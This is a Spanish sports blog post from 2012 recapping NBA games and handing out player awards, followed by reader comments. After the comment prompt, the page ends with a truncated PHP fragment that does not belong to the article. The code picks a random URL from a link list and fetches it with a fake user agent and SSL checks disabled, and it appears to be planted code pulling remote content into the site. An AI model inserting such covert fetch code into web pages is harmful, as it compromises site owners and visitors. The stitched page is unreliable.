La Crónica: el ‘pupas’ resiste

27 de March de 2012 por TheDeerHunter

nykJarro de agua fría para los Knicks, “el pupas” de la NBA, justo en medio de una racha fantástica tras la designación de Woodson como técnico, justo cuando empezaban a carburar sus mayores estrellas. Destacábamos especialmente a Stoudemire hace poco, de cómo le veíamos reencontrarse tras su discreta campaña… Amaré estará “out indefinitely” por una lesión de espalda. Fuera de servicio, en cristiano, y las esperanzas de volverle a ver este curso son dudosas. Veremos small ball extremo en la Gran Manzana a partir de hoy.

La buena noticia es que anoche funcionó frente a los Bucks (80-89) y que pudimos disfrutar de la mejor versión de Melo ejerciendo de falso 4. Sorprende lo mal que lo pasaron tanto Ilyasova como Mbah a Moute. Los ciervos parecen algo desdibujados tras la llegada de Ellis y la brecha de postemporada se abre aún más en el Este.

Los dos líderes de la conferencia cayeron. Los Heat se encuentran en medio de una mini-crisis y anoche fueron doblegados por los Pacers (90-105). En Chicago preocupa el estado de Rose y por si fuera poco anoche Lawson les hizo un traje a medida (108-91). Orlando aprovechó para reducir diferencias gracias al granizado de triples que les preparó Anderson a Toronto (117-101).

La conferencia la cerraban anoche Boston ganando sobradamente a Charlotte (102-95) y un feo Detroit @ Washington en que todo se resolvió en el último minuto con clutch de Stuckey para culminar la remontada piston (79-77).

En el Oeste los Jazz alargaban su momento dulce con una fácil victoria ante Nets (105-84). También Houston, y ambos entran así en posiciones de postemporada, aunque estos últimos necesitaran de prórroga para tumbar a los Kings (106-113) de Thornton & Cousins en el partido de su vida de Patrick Patterson.

Finalmente, los Clippers se vengaban de la última derrota en New Orleans con actuación destacada de CP3 (85-97).

ppiercePREMIOS

MVP: Con la ausencia de Ray Allen, Paul Pierce asume aún más protagonismo ofensivo. Anoche, además de 10 rebotes, 4 asistencias, 3 robos y 3 tapones, el de los Celtics se fue a los 36 puntos.

Rookie: 16 puntos, 8 rebotes, 5 asistencias, 2 robos… Parece que lo de Chandler Parsons no es casualidad.

Sorpresa: De manera aparatemente aleatoria aperece un partidazo de Mike Dunleavy. Ayer, ante los malos partidos de Jennings y Ellis, se convirtió en la mayor amenaza ofensiva de su equipo con 26 puntos (10 de 14). Patrick Patterson y Jameer Nelson también vivieron buenos partidos. El primero consiguió 24 puntos y el segundo 18 puntos (8 de  11) y 7 asistencias.

Decepción: Horrible día para Monta Ellis (2 de 14) y Brandon Jennings (6 de 22). Actuaciones como éstas dan la razón a los que decían que tras la llegada del ex de los Warriors, los Bucks necesitarán dos balones. Los 2 puntos y 1 asistencia de DJ Augustin no se quedan atrás.

Esfuerzo en vano: 38 puntos y 14 rebotes para DeMarcus Cousins en 50 minutos de juego. Desgraciadamente para él, su esfuerzo no comportó el triunfo de los Kings.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Joe Johnson dice:
    #1

    Kevin Durant y Joe Johnson jugadores de la semana

      Citar

  2. rumbero dice:
    #2

    Ha vuelto el más grande. Los Rockets lo firmaron por la mañana con un contrato de 10 dias, llegó al Toyota Center una hora antes del partido, y lo cerró con 4 tiros libres. 10/5 para lentejita. Jugón!!

      Citar

  3. simon dice:
    #3

    y echandole un poquito de mala leche, para celebrarlo Carmelo se marca un partidazo, con intensidad defensiva incluida…

      Citar

  4. Vader dice:
    #4

    A ver si lo de Stat no es grave porque es una pena. Con Woodson estan remando todos y el equipo esta dando la talla de su potencial. El año que viene queda muy lejos y habra que ver la plantilla que tenemos porque acaban contrato Lin (restringido) Fields, JR Smith y B.Davids….

      Citar

  5. Esteban dice:
    #5

    la lesion de amare puede ser un antes y un despues en los knicks, si bien amare es un all-star, su temporada no puede calificarse mas alla de discreta, sin el en el equipo, creo que melo tiene la chance de volver a ser melo, mas balones y espacio y ademas jugar cuando es posible de falso 4 sacando de la zona a las marcas

    con la temporada de novak, los minutos que melo puede jugar de 4 (y de 3 nada menos que j.r. smith) no sentiran su ausencia, creo que sera al contrario

      Citar

  6. Sancho88 dice:
    #6

    No sé por qué Carmelo se pasa todo el partido sonriendo, como si tuviera metido un vibrador por el culo. No sé si es porque es un hombre feliz, o porque tiene cara de tonto… pero coño, es contagioso eh? muy recomendable verle porque te alegra el día,

    Y, efectivamente, ha vuelto el más grande. Y yo lo he celebrado comiéndome un platico de esa legumbre tan característica que le da nombre y resuello. Qué jugador más especial, copón!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>